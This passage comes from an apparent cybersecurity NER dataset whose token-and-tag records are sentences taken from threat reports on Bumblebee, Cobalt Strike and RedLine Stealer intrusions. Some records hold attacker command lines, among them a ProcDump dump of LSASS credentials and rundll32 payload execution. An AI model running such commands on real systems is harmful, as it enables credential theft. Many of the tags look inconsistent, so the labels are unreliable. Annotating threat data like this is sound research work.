"w.bat" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way" ] }, { "tokens": [ "bat", "script:" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "bat", "script:" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "using", "Windows", "utilities", "like", "ping", "and", "tasklist." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "tasklist" ], "ner_tags": [ "O" ] }, { "tokens": [ "tasklist", "was", "also", "used", "in", "order", "to", "enumerate", "processes", "on", "multiple", "hosts", "remotely" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "process", "list" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "the", "threat", "actor", "started", "their", "first", "lateral", "movement", "using", "RDP" ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "they", "accessed", "the", "server", "via", "RDP" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Threat", "actors", "used", "explorer.exe,", "where", "they", "were", "previously", "injected", "into,", "to", "initiate", "a", "proxied", "RDP", "connection", "to", "a", "server:" ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actor", "started", "their", "first", "lateral", "movement", "using", "RDP", "to", "pivot", "to", "a", "server", "using", "the", "local", "Administrator", "account." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "first", "lateral", "movement", "from", "the", "beachhead", "to", "the", "server", "using", "RDP", "with", "an", "Administrator", "account:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "and", "again", "on", "a", "server", "with", "Administrator", "privileges." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "the", "Administrator", "account", "each", "time" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "execute", "Procdump,", "which", "was", "used", "to", "dump", "lsass." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-HackOrg" ] }, { "tokens": [ "they", "used", "yet", "another", "technique", "to", "dump", "LSASS", "on", "the", "beachhead", "host,", "this", "time", "using", "a", "built", "in", "Windows", "tool", "comsvcs.dll." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "B-SamFile" ] }, { "tokens": [ "dumping", "their", "LSASS", "process" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "LSASS", "Dump" ], "ner_tags": [ "B-Idus", "B-SecTeam" ] }, { "tokens": [ "Threat", "actors", "dumped", "the", "LSASS", "process", "from", "the", "beachhead", "using", "the", "comsvcs.dll", "MiniDump", "technique" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O" ] }, { "tokens": [ "C:\\programdata\\procdump64.exe", "-accepteula", "-ma", "lsass.exe", "C:\\ProgramData\\lsass.dmp" ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "Threat", "actors", "also", "dropped", "procdump.exe", "and", "procdump64.exe", "on", "multiple", "workstations", "remotely,", "dumped", "LSASS," ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Next,", "the", "threat", "actor", "transferred", "Sysinternals", "tool", "Procdump", "over", "SMB,", "to", "the", "ProgramData", "folders", "on", "multiple", "hosts", "in", "the", "environment." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Using", "the", "Cobalt", "Strike", "beacon,", "the", "threat", "actors", "transferred", "AnyDesk", "(1).exe", "file", "from", "the", "beachhead", "to", "a", "server:" ], "ner_tags": [ "O", "O", "B-Way", "I-Tool", "O", "O", "O", "O", "O", "B-Way", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actors", "also", "transferred", "ProcDump", "from", "the", "beachhead", "to", "multiple", "workstations:" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "first", "lateral", "movement", "was", "performed", "in", "order", "to", "drop", "and", "install", "AnyDesk." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "threat", "actors", "remotely", "dropped", "AnyDesk", "binary", "on", "a", "server", "from", "the", "beachhead:" ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "PowerShell", "to", "download", "and", "execute" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "which", "downloaded", "obfuscated", "PowerShell", "and", "executed", "it", "in", "memory:" ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "just", "C2", "communications;", "until", "around", "3", "hours", "later,", "Bumblebee", "dropped", "a", "Cobalt", "Strike", "beacon" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "B-Way", "I-Tool", "I-Tool" ] }, { "tokens": [ "dropping", "and", "the", "execution", "of", "several", "payloads", "using", "multiple", "techniques" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "threat", "actors", "used", "CS", "as", "the", "main", "Command", "and", "Control", "tool,", "dropped", "several", "payloads," ], "ner_tags": [ "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actors", "used", "a", "service", "account", "to", "execute", "a", "Cobalt", "Strike", "beacon", "remotely", "on", "a", "Domain", "Controller." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "C:\\Windows\\System32\\cmd.exe", "/c", "start", "rundll32", "namr.dll,IternalJob" ], "ner_tags": [ "O", "O", "O", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "Sysmon", "File", "Created", "event", "showing", "wab.exe", "created", "by", "rundll32.exe" ], "ner_tags": [ "B-SamFile", "I-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "B-SamFile" ] }, { "tokens": [ "cmd.exe", "/C", "rundll32.exe" ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "C:\\Windows\\System32\\rundll32.exe" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "Because", "rundll32.exe", "executed", "PowerShell,", "we", "can", "see", "that", "rundll32.exe", "created" ], "ner_tags": [ "O", "B-SamFile", "O", "B-Way", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "were", "initiated", "from", "the", "rundll32.exe", "process" ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "The", "random", "(PsExec)", "service", "runs", "a", "rundll32.exe", "process", "without", "any", "arguments." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "The", "metadata", "included", "TA", "machine’s", "hostname," ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "systeminfo" ], "ner_tags": [ "O" ] }, { "tokens": [ "wmic", "product", "get", "name,version" ], "ner_tags": [ "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "“Display", "information", "about", "current", "Windows", "version" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MAC", "address" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "ipconfig", "/all" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "showing", "wab.exe", "executed", "by", "WMI" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "B-SecTeam" ] }, { "tokens": [ "wmic", "/node" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "wmic" ], "ner_tags": [ "O" ] }, { "tokens": [ "obfuscated", "PowerShell" ], "ner_tags": [ "O", "B-Way" ] }, { "tokens": [ "Once", "deobfuscated," ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "its", "installation", "as", "a", "service", "was", "used", "in", "order", "to", "persist", "and", "create", "a", "backdoor", "to", "the", "network." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "the", "win32", "function", "CreateServiceA", "was", "used", "by", "the", "malware", "in", "order", "to", "create", "a", "remote", "service", "over", "RPC", "on", "the", "server." ], "ner_tags": [ "O", "B-Way", "B-Tool", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "remote", "service", "was", "created", "with", "random", "alphanumeric", "characters,", "service", "name", "and", "service", "file", "name" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Below", "is", "an", "example", "of", "the", "service", "edc603a", "that", "was", "created" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "new", "service", "was", "created" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "actors", "obtained", "and", "abused", "credentials", "of", "privilege", "domain", "accounts" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "service", "account,", "with", "Domain", "Administration", "permissions,", "was", "used", "to", "create", "a", "remote", "service", "on", "a", "Domain", "Controller", "to", "move", "laterally." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "service", "account", "logged", "into", "one", "of", "the", "Domain", "Controllers", "from", "the", "beachhead." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "We", "observed", "the", "threat", "actors", "deleting", "their", "tools", "(Procdump,", "Network", "scanning", "scripts,", "etc.)", "from", "hosts." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "ProcDump", "deletion", "from", "the", "ProgramData", "folder", "of", "all", "targeted", "workstations", "after", "dumping", "their", "LSASS", "process:" ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "actors", "also", "dropped", "procdump.exe", "and", "procdump64.exe", "on", "multiple", "workstations", "remotely,", "dumped", "LSASS,", "and", "deleted", "them", "from", "the", "ProgramData", "folder:" ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "whoami" ], "ner_tags": [ "O" ] }, { "tokens": [ "C", ":\\Windows\\system32\\cmd.exe", "/C", "shell", "whoami", "/all" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "win32", "function", "CreateServiceA", "was", "used", "by", "the", "malware" ], "ner_tags": [ "O", "B-Way", "B-Tool", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "account", "used", "to", "perform", "this", "lateral", "movement" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Threat", "actors", "executed", "this", "tool", "on", "patient", "0", "with", "low-level", "privileges", "multiple", "times" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actor", "then", "deployed", "Anydesk,", "which", "was", "the", "only", "observed", "persistence", "mechanism", "used", "during", "the", "intrusion." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "they", "accessed", "the", "server", "via", "Anydesk." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "AnyDesk", "and", "its", "installation", "as", "a", "service", "was", "used" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AnyDesk", "logs,", "%ProgramData%\\AnyDesk\\ad_svc.trace", "and", "%AppData%\\AnyDesk\\ad.trace,", "show", "that", "it", "was", "used", "during", "Day", "1", "and", "Day", "7", "of", "this", "intrusion" ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actors", "managed", "to", "get", "access", "to", "the", "beachhead", "host", "after", "the", "successful", "execution", "of", "a", "lnk", "file", "within", "an", "ISO,", "which", "are", "usually", "distributed", "through", "email", "campaigns." ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "I-OffAct", "O" ] }, { "tokens": [ "Threat", "actors", "also", "created", "a", "remote", "thread", "in", "svchost.exe" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Right", "after", "its", "execution,", "the", "wab.exe", "process", "created", "two", "remote", "threads", "in", "order", "to", "inject", "code", "into", "explorer.exe", "and", "rundll32.exe:" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "the", "service", "account", "password", "was", "weak", "and", "cracked", "offline", "by", "threat", "actors." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-HackOrg", "O" ] }, { "tokens": [ "Named", "pipes", "were", "created", "in", "order", "to", "establish", "communication", "between", "CS", "processes" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Named", "piped", "are", "commonly", "used", "by", "Cobalt", "Strike", "perform", "various", "techniques." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "used", "CMD-based", "scripts" ], "ner_tags": [ "O", "B-Way", "B-Tool" ] }, { "tokens": [ "CMD-based", "scripts" ], "ner_tags": [ "B-Way", "B-Tool" ] }, { "tokens": [ "CMD-based", "scripts" ], "ner_tags": [ "B-Way", "B-Tool" ] }, { "tokens": [ "gets", "executed", "via", "the", "“SHELLEXECUTE”." ], "ner_tags": [ "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "The", "first", ".CMD", "file", "set", "seen", "to", "use", "AutoIt", "in", "its", "execution" ], "ner_tags": [ "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Each", "email", "has", "an", "HTML", "attachment." ], "ner_tags": [ "O", "B-Way", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "The", "email", "text", "employs", "scare", "tactics,", "such", "as", "evidence", "of", "a", "traffic", "violation,", "prompting", "the", "user", "to", "open", "the", "HTML", "attachment" ], "ner_tags": [ "O", "B-Way", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "prompting", "the", "user", "to", "open", "the", "HTML", "attachment" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-SamFile" ] }, { "tokens": [ "contains", "some", "junk", "code", "and", "data", "in", "HEX", "format." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "The", "data", "blob", "in", "HEX", "decodes" ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "slightly", "obfuscated", "URL", "address" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "two", "base64", "encoded", "data", "blobs", "and", "code", "instructions", "for", "its", "execution." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "base64", "data", "block", "execution" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "first", "base64", "data", "blob" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "All", "data", "is", "then", "sent", "back", "to", "the", "attacker's", "C2" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O" ] }, { "tokens": [ "the", "attacker's", "C2", "via", "the", "HTTP", "POST", "method." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "The", "C2", "is", "constructed", "with", "the", "victim's", "enumerated", "data" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "extract", "sensitive", "information," ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "operating", "system", "version" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "OS", "architecture", "(x86", "or", "x64)" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "keyboard", "layout" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Opening", "the", "attached", "“multa_de_transito_502323.html”", "file", "triggers", "the", "embedded", "JavaScript" ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "download", "a", "“.VBS”", "file" ], "ner_tags": [ "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "It", "proceeds", "by", "downloading", "the", "“sqlite3.dll”", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "to", "steal", "Outlook", "data", "such", "as", "server,", "user,", "and", "password", "from", "POP3,", "SMPT,", "and", "IMAP", "registry", "keys" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "exploiting", "vulnerable", "web-facing", "devices" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "exfiltrate", "proprietary", "or", "confidential", "information," ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "decrypting", "a", "shellcode" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "starts", "by", "decrypting", "its", "initial", "configuration", "data" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "starts", "its", "code", "by", "decrypting", "its", "initial", "configuration" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "code", "of", "the", "decryption", "algorithm", "used", "by", "RedLine", "Stealer", "to", "decrypt", "its", "initial", "configuration", "data" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Once", "the", "initial", "configuration", "data", "has", "been", "decrypted" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "decrypt", "the", "password", "stored" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Once", "the", "master", "key", "is", "decrypted," ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "decrypt", "it", "using", "AES", "GCM", "algorithm" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "The", "decrypted", "password" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Try", "to", "disable", "Windows", "Defender", "service", "“WinDefend”" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Try", "to", "disable", "Tamper", "Protection", "settings", "of", "Windows", "Defender" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Try", "to", "Disable", "AntiSpyware,", "Real", "Time", "Protection", "and", "notification", "of", "Windows", "Defender." ], "ner_tags": [ "O", "O", "B-SamFile", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "B-SecTeam" ] }, { "tokens": [ "Disable", "Windows", "update", "services", "such", "as", "(“wuauserv”,", "“WaaSMedicSvc”,", "“UsoSvc”)" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "Disable", "Automatic", "Update", "and", "change", "Windows", "configurations", "related", "to", "Windows", "Update" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "which", "is", "often", "encoded", "or", "encrypted", "to", "prevent", "detection" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "combination", "of", "Base64", "and", "XOR", "functions." ], "ner_tags": [ "O", "O", "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "The", "master", "key", "is", "encoded", "with", "Base64", "and", "encrypted" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "grab", "the", "encoded", "and", "encrypted", "master", "key" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "it", "will", "parse", "the", "AES", "IV", "(Initialization", "vector)", "and", "the", "encrypted", "password" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "steal", "information", "from", "the", "compromised", "or", "targeted", "host" ], "ner_tags": [ "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "has", "the", "ability", "to", "collect", "or", "extract", "various", "types", "of", "system", "information", "from", "a", "targeted", "or", "compromised", "computer" ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "func_GetHostSerialNumber()" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "host", "serial", "number" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Retrieves", "system", "default", "language,", "timezone", "and", "OS", "version" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Get", "processor", "information", "of", "the", "compromised", "host", "by", "executing", "\"SELECT", "*", "FROM", "Win32_Processor\"" ], "ner_tags": [ "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-SamFile", "B-Way", "B-SecTeam" ] }, { "tokens": [ "func_GetProcessor()" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "func_GetLanguageTimeZoneOsVersion()" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "func_GetGraphicCards" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "Get", "AdapterRAM", "and", "Graphic", "Card", "Name", "and", "type", "by", "executing", "\"root\\\\CIMV2\",", "\"SELECT", "*", "FROM", "Win32_VideoController\"" ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "func_GetTotalRAM()" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "Get", "the", "total", "RAM", "size", "of", "compromised", "host", "by", "executing", "\"SELECT", "*", "FROM", "Win32_OperatingSystem\"", "and", "look", "for", "\"TotalVisibleMemorySize\"" ], "ner_tags": [ "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Retrieve", "the", "user", "domain", "name,", "username" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Get", "the", "user", "name", "of", "the", "compromised", "host" ], "ner_tags": [ "O", "B-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "func_GetUserName()" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "Parse", "firewall", "and", "Anti", "Virus", "Product", "install", "in", "the", "compromised", "host", "by", "running", "\"SELECT", "*", "FROM", "ROOT\\\\SecurityCenter2\"", "\"SELECT", "*", "FROM", "ROOT\\\\SecurityCenter\"", "\"SELECT", "*", "FROM", "AntivirusProduct\"", "\"SELECT", "*", "FROM", "FirewallProduct\"", "\"SELECT", "*", "FROM", "AntiSpyWareProduct\"" ], "ner_tags": [ "B-Way", "B-Tool", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SecTeam", "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "B-SecTeam", "B-SamFile", "B-SamFile", "B-SamFile", "B-SecTeam" ] }, { "tokens": [ "func_GetFirewalls()" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "func_ListProcesses()" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "Retrieve", "process", "list", "and", "process", "information", "by", "running", "'SELECT", "*", "FROM", "Win32_Process'" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Screen", "Capture" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "func_ScanScreen()", "is", "the", "one", "responsible", "for", "this", "screen", "capture", "capability" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "has", "a", "functionality", "to", "capture", "a", "screenshot", "of", "the", "targeted", "or", "compromised", "host", "as", "part", "of", "its", "data", "collection", "and", "exfiltration" ], "ner_tags": [ "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", ".NET", "Graphics", "class", "CopyFromScreen", "Function()", "to", "transfer", "a", "bit", "block", "of", "color", "data", "from", "the", "screen", "to", "the", "Graphic", "drawing", "surface", "that", "will", "be", "saved", "in", "memory", "stream", "for", "data", "exfiltration." ], "ner_tags": [ "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "Parse", "all", "installed", "application", "in", "the", "compromised", "host", "by", "querying", "'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall'", "registry" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Parse", "browser", "application", "and", "browser", "version", "installed", "in", "the", "compromised", "host", "by", "querying", "\"SOFTWARE\\WOW6432Node\\Clients\\StartMenuInternet\"", "or", "\"SOFTWARE\\Clients\\StartMenuInternet\"", "registry" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "uses", ".NET", "Graphics", "class", "CopyFromScreen", "Function()" ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "B-Way", "O" ] }, { "tokens": [ "using", "Windows", "CryptProtectData()", "API." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "cracking", "browser", "sensitive", "information", "like", "passwords" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "decrypted", "password", "will", "be", "sent", "to", "its", "C2", "Server", "as", "part", "of", "its", "data", "exfiltration." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "it", "enumerates", "several", "known", "Crypto", "Wallet", "directories", "and", "looks", "for", "files", "related", "to", "crypto", "currencies", "by", "looking", "for", "files", "having", "“wallet”", "substring", "on", "its", "file", "name." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "a", "compiled", "remote", "desktop", "malware," ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "then", "executed", "RDPEnable", "on", "the", "infected", "machine." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "There", "were", "also", "instances", "of", "the", "malware", "actors", "using", "PsEXEC", "to", "enable", "the", "remote", "desktop", "protocol", "(RDP)", "of", "a", "target", "system" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", 